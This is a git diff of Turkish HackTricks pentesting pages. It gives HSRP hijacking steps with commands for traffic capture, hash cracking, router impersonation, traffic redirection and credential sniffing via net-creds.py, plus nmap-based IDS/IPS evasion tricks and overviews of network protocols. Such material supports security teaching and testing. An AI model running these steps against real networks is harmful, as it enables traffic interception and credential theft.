HSRP iki sürümde gelir, HSRPv1 ve HSRPv2, grup kapasitesi, çoklu yayın IP kullanımı ve sanal MAC adres yapısıısından farklılık gösterir. Protokol, hizmet bilgileri alışverişi için belirli çoklu yayın IP adreslerini kullanır, Hello paketleri her 3 saniyede bir gönderilir. Bir yönlendiriciye 10 saniyelik bir süre içinde paket alınmazsa etkin olmadığı varsayılır.
#### HSRP Saldırı Mekanizması
HSRP saldırıları, Etkin Yönlendirici'nin rolünü zorla alarak maksimum öncelik değeri enjekte etmeyi içerir. Bu, Man-In-The-Middle (MITM) saldırısına yol açabilir. Temel saldırı öncesi adımlar arasında HSRP yapılandırması hakkında veri toplamak yer alır, bu da trafiği analiz etmek için Wireshark kullanılarak yapılabilir.
#### HSRP Kimlik Doğrulamasını Atlayan Adımlar
#### HSRP Kimlik Doğrulamasını Atlayma Adımları
1. HSRP verilerini içeren ağ trafiğini .pcap dosyası olarak kaydedin.
```shell
tcpdump -w hsrp_traffic.pcap
@ -113,13 +100,13 @@ john --wordlist=mywordlist.txt hsrp_hashes
sudo ip link set eth0 promisc on
sudo sysctl -w net.ipv4.ip_forward=1
```
3. Loki'yi belirli yönlendiriciyi hedeflemek, kırılmış HSRP şifresini girmek ve Etkin Yönlendiriciyi taklit etmek için gerekli yapılandırmaları yapmak için kullanın.
3. Loki'yi belirli yönlendiriciyi hedeflemek için kullanın, kırılmış HSRP şifresini girin ve Etkin Yönlendirici'yi taklit etmek için gerekli yapılandırmaları yapın.
4. Etkin Yönlendirici rolünü aldıktan sonra, ağ arayüzünü ve IP tablolarını yapılandırarak meşru trafiği engelleyin.
```shell
sudo ifconfig eth0:1 10.10.100.254 netmask 255.255.255.0
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
```
5. Trafik yönlendirmek için yönlendirme tablosunu değiştirin ve eski Etkin Yönlendirici üzerinden trafiği yönlendirin.
5. Trafik yönlendirmek için yönlendirme tablosunu değiştirin ve önceki Etkin Yönlendirici üzerinden yönlendirin.
```shell
sudo route del default
sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100
@ -129,4 +116,4 @@ sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100
sudo python2 net-creds.py -i eth0
```
Bu adımları uygulamak saldırganı, GLBP sızma yöntemi için yapılan işlemlere benzer şekilde trafiği engellemek ve manipüle etmek için bir konuma yerleştirir. Bu, HSRP gibi yedeklilik protokollerindeki zafiyeti ve sağlam güvenlik önlemlerine olan ihtiyacı vurgular.
Bu adımları uygulamak, saldırganı trafiği engellemek ve manipüle etmek için bir konuma yerleştirir, GLBP ele geçirmesi için yapılan işleme benzer. Bu, HSRP gibi yedeklilik protokollerindeki zafiyeti ve sağlam güvenlik önlemlerine olan ihtiyacı vurgular.

View file

@ -1,71 +1,73 @@
{% hint style="success" %}
Öğren ve AWS Hacking pratiği yap:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Öğren ve GCP Hacking pratiği yap: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman olmak için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekle</summary>
HackTricks'ı desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamını görmek isterseniz** veya **HackTricks'i PDF olarak indirmek isterseniz** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter'da** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'i **takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol et!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katıl veya [**telegram grubuna**](https://t.me/peass) katıl veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip et.**
* **Hacking püf noktalarını paylaşmak için PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulun.
</details>
{% endhint %}
# **TTL Manipülasyonu**
IDS/IPS'ye ulaşacak kadar TTL değeri olan paketler gönderin, ancak son sistemde ulaşacak kadar değil. Ardından, diğer paketleri aynı dizilerle gönderin, böylece IPS/IDS bunların tekrar olduğunu düşünecek ve kontrol etmeyecektir, ancak aslında zararlı içeriği taşıyor olacaklar.
IDS/IPS'ye ulaşacak kadar TTL değerine sahip paketler gönderin ancak son sistemde ulaşmayacak kadar yetersiz olsun. Sonra, diğer paketleri aynı dizilerle gönderin, böylece IPS/IDS bunların tekrarlar olduğunu düşünecek ve kontrol etmeyecek, ancak aslında kötü amaçlı içeriği taşıyor olacaklar.
**Nmap seçeneği:** `--ttlvalue <değer>`
# İmza Kaçınma
# İmzalardan Kaçınma
Sadece paketlere gereksiz veri ekleyin, böylece IPS/IDS imzası kaçınılabilir.
Sadece paketlere gereksiz veri ekleyin böylece IPS/IDS imzasından kaçınılabilir.
**Nmap seçeneği:** `--data-length 25`
# **Parçalanmış Paketler**
Paketleri parçalayın ve gönderin. IDS/IPS bunları yeniden birleştirme yeteneğine sahip değilse, paketler son hedefe ulaşır.
Paketleri parçalayın ve gönderin. IDS/IPS bunları yeniden birleştirebilecek yeteneğe sahip değilse, paketler son ana bilgisayara ulaşacaktır.
**Nmap seçeneği:** `-f`
# **Geçersiz** _**checksum**_
Sensörler genellikle performans nedenleriyle checksum hesaplamazlar. Bu nedenle, bir saldırgan, sensör tarafından yorumlanacak ancak son hedef tarafından reddedilecek bir paket gönderebilir. Örnek:
Sensörler genellikle performans nedenleriyle checksum hesaplamazlar. Bu nedenle, bir saldırgan sensör tarafından yorumlanacak ancak son ana bilgisayar tarafından reddedilecek bir paket gönderebilir. Örnek:
Geçersiz bir checksum ile RST bayrağı taşıyan bir paket gönderin, böylece IPS/IDS bu paketin bağlantıyı kapatmaya gittiğini düşünebilir, ancak son hedef, checksum geçersiz olduğu için paketi reddeder.
Geçersiz bir checksum ile RST bayrağı taşıyan bir paket gönderin, böylece IPS/IDS bu paketin bağlantıyı kapatmaya gittiğini düşünebilir, ancak son ana bilgisayar checksum geçersiz olduğu için paketi reddeder.
# **Sıradışı IP ve TCP seçenekleri**
Bir sensör, IP ve TCP başlıklarında belirli bayraklar ve seçeneklerle paketleri dikkate almazken, hedef ana bilgisayar paketi alır almaz kabul eder.
Bir sensör, IP ve TCP başlıklarında belirli bayraklar ve seçeneklerle ayarlanmış paketleri dikkate almazken, hedef ana bilgisayar paketi alır.
# **Örtüşme**
# **Çakışma**
Bir paketi parçaladığınızda, paketler arasında bazı örtüşmeler olabilir (belki paket 2'nin ilk 8 baytı paket 1'in son 8 baytıyla örtüşür ve paket 2'nin son 8 baytı paket 3'ün ilk 8 baytıyla örtüşür). Ardından, IDS/IPS bunları son hedeften farklı bir şekilde birleştirirse, farklı bir paket yorumlanır.\
Veya belki, aynı ofsete sahip 2 paket gelir ve ana bilgisayar hangisini alacağına karar vermek zorunda kalır.
Bir paketi parçaladığınızda, paketler arasında bir tür çakışma olabilir (belki de ikinci paketin ilk 8 baytı birinci paketin son 8 baytıyla çakışır ve ikinci paketin son 8 baytı üçüncü paketin ilk 8 baytıyla çakışır). Ardından, IDS/IPS bunları farklı bir şekilde yeniden birleştirirse, farklı bir paket yorumlanır.\
Ya da belki, aynı ofsette 2 paket gelir ve ana bilgisayar hangisini alacağına karar vermek zorunda kalır.
* **BSD**: Daha küçük _ofset_ değerine sahip paketlere öncelik verir. Aynı ofsete sahip paketler için ilkini seçer.
* **Linux**: BSD gibi, ancak aynı ofsete sahip son paketi tercih eder.
* **İlk** (Windows): Gelen ilk değer, kalır.
* **Son** (cisco): Gelen son değer, kalır.
* **İlk** (Windows): Gelen ilk değer, kalan değerdir.
* **Son** (cisco): Gelen son değer, kalan değerdir.
# Araçlar
* [https://github.com/vecna/sniffjoke](https://github.com/vecna/sniffjoke)
{% hint style="success" %}
Öğren ve AWS Hacking pratiği yap:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Öğren ve GCP Hacking pratiği yap: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman olmak için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekle</summary>
HackTricks'ı desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamını görmek isterseniz** veya **HackTricks'i PDF olarak indirmek isterseniz** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter'da** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'i **takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol et!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katıl veya [**telegram grubuna**](https://t.me/peass) katıl veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip et.**
* **Hacking püf noktalarını paylaşmak için PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulun.
</details>
{% endhint %}

View file

@ -1,25 +1,26 @@
{% hint style="success" %}
Öğren ve AWS Hacking pratiği yap:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Öğren ve GCP Hacking pratiği yap: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman olmak için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>öğrenin!</strong></summary>
<summary>HackTricks'i Destekle</summary>
HackTricks'ı desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamını görmek isterseniz** veya **HackTricks'i PDF olarak indirmek isterseniz** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter'da** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'i **takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol et!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katıl veya [**telegram grubuna**](https://t.me/peass) katıl veya **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**'ı takip et.**
* **Hacking püf noktalarını paylaşmak için PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulun.
</details>
{% endhint %}
## Multicast DNS (mDNS)
**mDNS** protokolü, ayrılmış bir ad sunucusu olmadan küçük, yerel ağlarda IP adresi çözümlemesi için tasarlanmıştır. Bu protokol, belirtilen adı olan ana bilgisayara IP adresiyle yanıt vermesi için bir sorguyu alt ağda çoklu yayın yaparak çalışır. Alt ağdaki tüm cihazlar daha sonra bu bilgiyle mDNS önbelleklerini güncelleyebilir.
**mDNS** protokolü, özel bir ad sunucusu olmadan küçük, yerel ağlarda IP adresi çözümlemesi için tasarlanmıştır. Belirtilen adı taşıyan ana bilgisayara IP adresi ile yanıt vermesi için alt ağ içinde bir sorgu çoklu yayın yaparak çalışır. Alt ağdaki tüm cihazlar daha sonra bu bilgiyle mDNS önbelleklerini güncelleyebilir.
Dikkate alınması gereken önemli noktalar:
- **Alan Adı İptali**: Bir ana bilgisayar, TTL'si sıfır olan bir paket göndererek alan adını serbest bırakabilir.
- **Kullanım Kısıtlaması**: mDNS genellikle yalnızca **.local** ile biten adları çözümler. Bu alanda mDNS dışındaki ana bilgisayarlarla çakışmalar, ağ yapılandırması ayarlarını gerektirebilir.
Dikkat edilmesi gereken ana noktalar:
- **Alan Adı Vazgeçişi**: Bir ana bilgisayar, TTL'si sıfır olan bir paket göndererek alan adını serbest bırakabilir.
- **Kullanım Kısıtlaması**: mDNS genellikle yalnızca **.local** ile biten adları çözümler. Bu alandaki mDNS dışı ana bilgisayarlarla çakışmalar, ağ yapılandırma ayarlarını gerektirir.
- **Ağ Ayrıntıları**:
- Ethernet çoklu yayın MAC adresleri: IPv4 - `01:00:5E:00:00:FB`, IPv6 - `33:33:00:00:00:FB`.
- IP adresleri: IPv4 - `224.0.0.251`, IPv6 - `ff02::fb`.
@ -28,43 +29,47 @@ Dikkate alınması gereken önemli noktalar:
## DNS-SD (Hizmet Keşfi)
DNS-SD, belirli alan adlarını sorgulayarak ağdaki hizmetleri keşfetmek için bir protokoldür (örneğin, `_printers._tcp.local`). Yanıt, bu durumda mevcut yazıcılar gibi tüm ilgili alan adlarını içerir. Hizmet türlerinin kapsamlı bir listesi [burada](http://www.dns-sd.org/ServiceTypes.html) bulunabilir.
DNS-SD, belirli alan adlarını sorgulayarak ağdaki hizmetleri keşfetmek için bir protokoldür (örneğin, `_printers._tcp.local`). Bir yanıt, bu durumda mevcut yazıcılar gibi tüm ilgili alanları içerir. Hizmet türlerinin kapsamlı bir listesi [burada](http://www.dns-sd.org/ServiceTypes.html) bulunabilir.
## SSDP (Basit Hizmet Keşif Protokolü)
SSDP, ağ hizmetlerinin keşfini kolaylaştırır ve genellikle UPnP tarafından kullanılır. Bu, çoklu yayın adresleme kullanarak UDP üzerinden çalışan metin tabanlı bir protokoldür. IPv4 için belirlenen çoklu yayın adresi `239.255.255.250`'dir. SSDP'nin temeli [HTTPU](https://en.wikipedia.org/wiki/HTTPU) olarak bilinen, UDP için HTTP'nin bir uzantısıdır.
SSDP, ağ hizmetlerinin keşfini kolaylaştırır ve genellikle UPnP tarafından kullanılır. Çoklu yayın adresleme ile UDP üzerinden (port 1900) kullanılan metin tabanlı bir protokoldür. IPv4 için belirlenmiş çoklu yayın adresi `239.255.255.250`'dir. SSDP'nin temeli [HTTPU](https://en.wikipedia.org/wiki/HTTPU), UDP için HTTP'nin bir uzantısıdır.
## Cihazlar için Web Hizmeti (WSD)
Bir ağa bağlı cihazlar, Web Hizmeti (WSD) aracılığıyla mevcut hizmetleri, örneğin yazıcıları, tanımlayabilir. Bu, UDP paketlerinin yayınlanmasıyla gerçekleştirilir. Hizmet arayan cihazlar istek gönderirken, hizmet sağlayıcıları sunumlarını duyururlar.
Ağa bağlı cihazlar, Web Hizmeti için Cihazlar (WSD) aracılığıyla mevcut hizmetleri, örneğin yazıcıları, tanımlayabilir. Bu, UDP paketleri yayınlamayı içerir. Hizmet arayan cihazlar istek gönderirken, hizmet sağlayıcıları tekliflerini duyururlar.
## OAuth 2.0
OAuth 2.0, kullanıcı bilgilerinin güvenli ve seçici paylaşımını kolaylaştıran bir protokoldür. Örneğin, birden fazla oturum açma olmadan Google'dan kullanıcı verilerine erişimi sağlar. Süreç, kullanıcı kimlik doğrulaması, kullanıcı tarafından yetkilendirme ve Google tarafından belirtilen kullanıcı verilerine hizmet erişimine izin veren bir belirteç oluşturma adımlarını içerir.
OAuth 2.0, kullanıcı bilgilerinin güvenli, seçici paylaşımını kolaylaştıran bir protokoldür. Örneğin, Google'dan kullanıcı verilerine birden fazla giriş yapmadan erişimi sağlar. Süreç, kullanıcı kimlik doğrulamasını, kullanıcı tarafından yetkilendirme işlemini ve Google tarafından belirtilen kullanıcı verilerine hizmet erişimini sağlayan belirteç oluşturmayı içerir.
## RADIUS
RADIUS (Uzaktan Kimlik Doğrulama Dial-In Kullanıcı Hizmeti), genellikle ISS'ler tarafından kullanılan bir ağ erişim protokolüdür. Kimlik doğrulama, yetkilendirme ve hesaplama işlemlerini destekler. Kullanıcı kimlik bilgileri, RADIUS sunucusu tarafından doğrulanır ve ek güvenlik için ağ adresi doğrulaması da içerebilir. Kimlik doğrulama sonrasında kullanıcılar ağ erişimi alır ve oturum ayrıntıları faturalandırma ve istatistiksel amaçlarla takip edilir.
RADIUS (Uzak Kimlik Doğrulama Dial-In Kullanıcı Servisi), genellikle İSS'ler tarafından kullanılan bir ağ erişim protokolüdür. Kimlik bilgileri, RADIUS sunucusu tarafından doğrulanır ve ek güvenlik için ağ adresi doğrulamasını içerebilir. Kimlik doğrulama sonrasında kullanıcılar ağ erişimi alır ve oturum ayrıntıları faturalandırma ve istatistiksel amaçlar için izlenir.
## SMB ve NetBIOS
### SMB (Sunucu İleti Bloğu)
SMB, dosya, yazıcı ve bağlantı noktalarını paylaşmak için bir protokoldür. Doğrudan TCP üzerinden (port 445) veya NetBIOS üzerinden TCP üzerinden (portlar 137, 138) çalışır. Bu çift uyumluluk, çeşitli cihazlarla bağlantıyı geliştirir.
SMB, dosyaları, yazıcıları ve bağlantı noktalarını paylaşmak için bir protokoldür. Doğrudan TCP üzerinden (port 445) veya TCP üzerinden NetBIOS aracılığıyla (portlar 137, 138) çalışır. Bu çift uyumluluk, çeşitli cihazlarla bağlantıyı artırır.
### NetBIOS (Ağ Temel Giriş/Çıkış Sistemi)
NetBIOS, kaynak paylaşımı için ağ oturumlarını ve bağlantıları yönetir. Cihazlar için benzersiz adları ve birden çok cihaz için grup adlarını destekler, hedefe yönelik veya yayın mesajlaşmasını sağlar. İletişim bağlantısız (onay almayan) veya bağlantı tabanlı (oturum tabanlı) olabilir. NetBIOS geleneksel olarak IPC/IPX gibi protokoller üzerinde çalışırken, genellikle TCP/IP üzerinde kullanılır. Hızıyla bilinen ilişkili bir protokol olan NetBEUI, yayın yapması nedeniyle oldukça ayrıntılıdır.
NetBIOS, kaynak paylaşımı için ağ oturumlarını ve bağlantıları yönetir. Cihazlar için benzersiz adları ve birden fazla cihaz için grup adlarını destekler, hedefe yönelik veya yayın mesajlaşmasını sağlar. İletişim bağlantısız (yanıt alınmaz) veya bağlantı odaklı (oturum tabanlı) olabilir. NetBIOS geleneksel olarak IPC/IPX gibi protokoller üzerinde çalışırken, genellikle TCP/IP üzerinde kullanılır. Hızıyla bilinen ilişkili bir protokol olan NetBEUI, yayın yapmasından dolayı oldukça ayrıntılıydı.
## LDAP (Hafif Dizin Erişim Protokolü)
LDAP, TCP/IP üzerinden dizin bilgilerinin yönetimini ve erişimini sağlayan bir protokoldür. Sorgulama ve dizin bilgilerini değiştirme için çeşitli işlemleri destekler. Genellikle dağıtık dizin bilgi hizmetlerine erişim ve bakım için kullanılır, LDAP iletişimi için tasarlanmış veritabanlarıyla etkileşim sağlar.
LDAP, TCP/IP üzerinden dizin bilgilerinin yönetimini ve erişimini sağlayan bir protokoldür. Dizin bilgilerini sorgulamak ve değiştirmek için çeşitli işlemleri destekler. Genellikle, dağıtılmış dizin bilgi hizmetlerine erişim ve bakım için kullanılır, LDAP ile iletişim için tasarlanmış veritabanlarıyla etkileşime izin verir.
## Active Directory (AD)
Active Directory, kullanıcılar, gruplar, ayrıcalıklar ve kaynaklar gibi nesneleri içeren ağa erişilebilir bir veritabanıdır ve ağ varlıklarının merkezi yönetimini kolaylaştırır. AD, alanlar adlı hiyerarşik bir yapıya sahip verilerini düzenler, bu alanlar sunucuları, grupları ve kullanıcıları içerebilir. Alt alanlar daha fazla bölümlendirmeye izin verir ve her biri kendi sunucusunu ve kullanıcı tabanını koruyabilir. Bu yapı, kullanıcı yönetimini merkezileştirir, ağ kaynaklarına erişimi sağlar veya kısıtlar. İletişim bilgileri gibi belirli bilgileri almak veya alan içinde yazıcılar gibi kaynakları bulmak için sorgular yapılabilir.
Active Directory, kullanıcılar, gruplar, ayrıcalıklar ve kaynaklar gibi nesneleri içeren ağa erişilebilir bir veritabanıdır ve ağ varlıklarının merkezi yönetimini kolaylaştırır. AD, alanlarının hiyerarşik bir yapıda düzenlenmesini sağlar; sunucuları, grupları ve kullanıcıları içerebilen alanlar. Alt alanlar daha fazla bölümleme sağlar, her biri kendi sunucusunu ve kullanıcı tabanını koruyabilir. Bu yapı, kullanıcı yönetimini merkezileştirir, ağ kaynaklarına erişimi sağlar veya kısıtlar. Belirli bilgileri, örneğin iletişim bilgilerini almak veya alan içindeki yazıcıları bulmak için sorgular yapılabilir.
{% hint style="success" %}
Öğren ve AWS Hacking pratiği yap:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Öğren ve GCP Hacking pratiği yap: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman olmak için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>öğrenin!</strong></summary>
<summary>HackTricks'i Destekle</summary>
HackTricks'ı desteklemenin diğer yolları:
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol et!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katıl veya [**telegram grubuna**](https://t.me/peass) katıl veya **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**'ı takip et.**
* **Hacking püf noktalarını paylaşmak için PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulun.
* Şirketinizi HackTricks'te **reklamını görmek isterseniz** veya **HackTricks'i PDF olarak indirmek isterseniz** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opense
</details>
{% endhint %}

View file

@ -1,18 +1,19 @@
# Nmap Özeti (ESP)
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahramana öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> ile!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'i desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI'na**](https://github.com/sponsors/carlospolop) göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'da takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR göndererek HackTricks** ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github depolarına katkıda bulunun.**
</details>
{% endhint %}
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
@ -33,15 +34,15 @@ nmap -sV -sC -O -n -oA nmapscan 192.168.0.1/24
Nmap varsayılan olarak `-PA80 -PS443 -PE -PP` oluşan bir keşif aşaması başlatır.
* **`-sL`**: İstilacı değildir, hedefleri listeler ve isimleri çözmek için **DNS** istekleri yapar. Örneğin www.prueba.es/24 gibi tüm IP'lerin hedeflerimiz olup olmadığını bilmek için faydalıdır.
* **`-Pn`**: **Ping yok**. Tümünün aktif olduğunu biliyorsanız (aksi halde çok zaman kaybedebilirsiniz, ancak bu seçenek aynı zamanda aktif olmadıklarını belirten yanlış negatifler de üretir), keşif aşamasını engeller.
* **`-sn`** : **Port taraması yok**. Keşif aşamasını tamamladıktan sonra port taraması yapmaz. Nispeten gizlidir ve küçük bir ağ taramasına izin verir. Yetkilerle 80'e bir ACK (-PA), 443'e bir SYN(-PS) ve bir echo isteği ve bir zaman damgası isteği gönderir, yetkisiz kullanıldığında her zaman bağlantılar tamamlanır. Hedef ağsa, yalnızca ARP(-PR) kullanır. Başka bir seçenekle kullanıldığında, yalnızca diğer seçeneğin paketleri bırakılır.
* **`-Pn`**: **Ping yok**. Tümünün aktif olduğunu biliyorsanız (aksi takdirde çok zaman kaybedebilirsiniz, ancak bu seçenek aynı zamanda aktif olmadıklarını belirterek yanlış negatifler üretir), keşif aşamasını engeller.
* **`-sn`** : **Port taraması yok**. Keşif aşamasını tamamladıktan sonra port taraması yapmaz. Nispeten gizli ve küçük bir ağ taramasına izin verir. Yetkilerle 80'e bir ACK (-PA), 443'e bir SYN(-PS) ve bir echo isteği ile bir Zaman damgası isteği gönderir, yetkiler olmadan her zaman bağlantıları tamamlar. Hedef ağsa, yalnızca ARP(-PR) kullanır. Başka bir seçenekle kullanıldığında, yalnızca diğer seçeneğin paketleri bırakılır.
* **`-PR`**: **Ping ARP**. Ağımızdaki bilgisayarları analiz ederken varsayılan olarak kullanılır, ping'leri kullanmaktan daha hızlıdır. ARP paketleri kullanmak istemiyorsanız `--send-ip` kullanın.
* **`-PS <ports>`**: Eğer SYN/ACK ile cevap veriyorsa açıktır (bağlantıyı sonlandırmamak için RST ile cevap verir), eğer RST ile cevap veriyorsa kapalıdır ve cevap vermiyorsa ulaşılamazdır. Yetkileri yoksa, otomatik olarak toplam bir bağlantı kullanılır. Eğer portlar belirtilmemişse, 80'e gönderilir.
